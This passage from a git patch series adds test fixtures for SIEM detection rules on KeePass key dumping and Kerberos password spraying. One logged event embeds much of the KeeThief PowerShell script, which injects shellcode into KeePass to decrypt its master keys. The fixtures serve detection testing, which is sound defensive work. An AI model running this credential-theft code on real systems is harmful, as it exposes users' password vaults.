GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('AnotherMethod').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"} -{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.9801378Z\"},\"EventRecordID\":\"7071\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 
18:55:04.980\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1384\"},{\"Name\":\"StartAddress\",\"text\":\"0x06160000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", 
"subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.980Z", "type": "raw", "uuid": "d26cbfcd-61bb-4a46-83a3-3a1379d98dbc"} - -expect not {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"} From 112eb8688c1106cc3200220ee4778b0e02bc3909 Mon Sep 17 00:00:00 2001 From: shadow2033 <135636880+shadow2033@users.noreply.github.com> Date: Sat, 29 Jul 2023 18:47:36 +0300 Subject: [PATCH 09/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=20=D0=B4=D0=BB=D1=8F=20?= =?UTF-8?q?=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(Kerberos=5Fpwd=5F?= =?UTF-8?q?spraying)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../Kerberos_pwd_spraying/tests/test_1.sc | 13 +++++++++++++ 1 file changed, 13 insertions(+) create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc new file mode 100644 index 00000000..ba66c9ce --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Kerberos_pwd_spraying/tests/test_1.sc 
@@ -0,0 +1,13 @@ +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:29:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", 
"logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:29:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f9c"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30c}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:31:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"mc\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication 
information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "mc", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:31:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f9f"} +{"action": "login", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30a}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:33:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"bob\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", 
"msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "bob", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:33:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e512f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30b}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:34:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"corn\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", 
"datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "corn", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:34:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e513f"} +{"action": "login", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30r}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:35:36.4258382Z\"},\"EventRecordID\":\"887115\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"4856\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"smoorf\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-107103\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55968\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", 
"msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.041Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55968, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-107103", "subject.account.name": "smoorf", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:35:36.425Z", "type": "raw", "uuid": "3aa04a6d-8343-4797-b414-ef44ab6e514f"} +{"action": "login", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:29:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"Administrator1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": 
"THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": "4771", "normalized": true, "object": "system", "reason": "0x18", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-02T14:21:43.040Z", "src.host": "172.16.66.1", "src.ip": "172.16.66.1", "src.port": 55967, "status": "failure", "subject": "account", "subject.account.id": "S-1-5-21-308926384-506822093-3341789130-500", "subject.account.name": "administrator1", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-05-22T20:29:36.425Z", "type": "raw", "uuid": "cda0152b-e8c7-47e1-b484-28ba19625f8c"} +{"action": "login", "body": 
"{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30c}\"},\"EventID\":\"4771\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14339\",\"Opcode\":\"0\",\"Keywords\":\"0x8010000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-05-22T20:31:36.4253654Z\"},\"EventRecordID\":\"887114\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"568\",\"ThreadID\":\"2356\"},\"Channel\":\"Security\",\"Computer\":\"01566s-win16-ir.threebeesco.com\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"TargetUserName\",\"text\":\"mc1\"},{\"Name\":\"TargetSid\",\"text\":\"S-1-5-21-308926384-506822093-3341789130-500\"},{\"Name\":\"ServiceName\",\"text\":\"krbtgt/THREEBEESCO.COM\"},{\"Name\":\"TicketOptions\",\"text\":\"0x10\"},{\"Name\":\"Status\",\"text\":\"0x18\"},{\"Name\":\"PreAuthType\",\"text\":\"2\"},{\"Name\":\"IpAddress\",\"text\":\"172.16.66.1\"},{\"Name\":\"IpPort\",\"text\":\"55967\"},{\"Name\":\"CertIssuerName\"},{\"Name\":\"CertSerialNumber\"},{\"Name\":\"CertThumbprint\"}]}}}", "category.generic": "Operating System", "category.high": "Access Management", "category.low": "Communication", "datafield2": "Standard password authentication", "datafield4": "Pre-authentication information was invalid", "datafield5": "THREEBEESCO.COM", "datafield8": "0x10", "event_src.category": "AAA", "event_src.fqdn": "01566s-win16-ir.threebeesco.com", "event_src.host": "01566s-win16-ir.threebeesco.com", "event_src.hostname": "01566s-win16-ir", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4771_Kerberos_pre_authentication_failed", "importance": "info", "input_id": "00000000-0000-0000-0000-000000000000", "logon_service": "krbtgt", "logon_type": 2, "mime": "application/x-pt-eventlog", "msgid": 
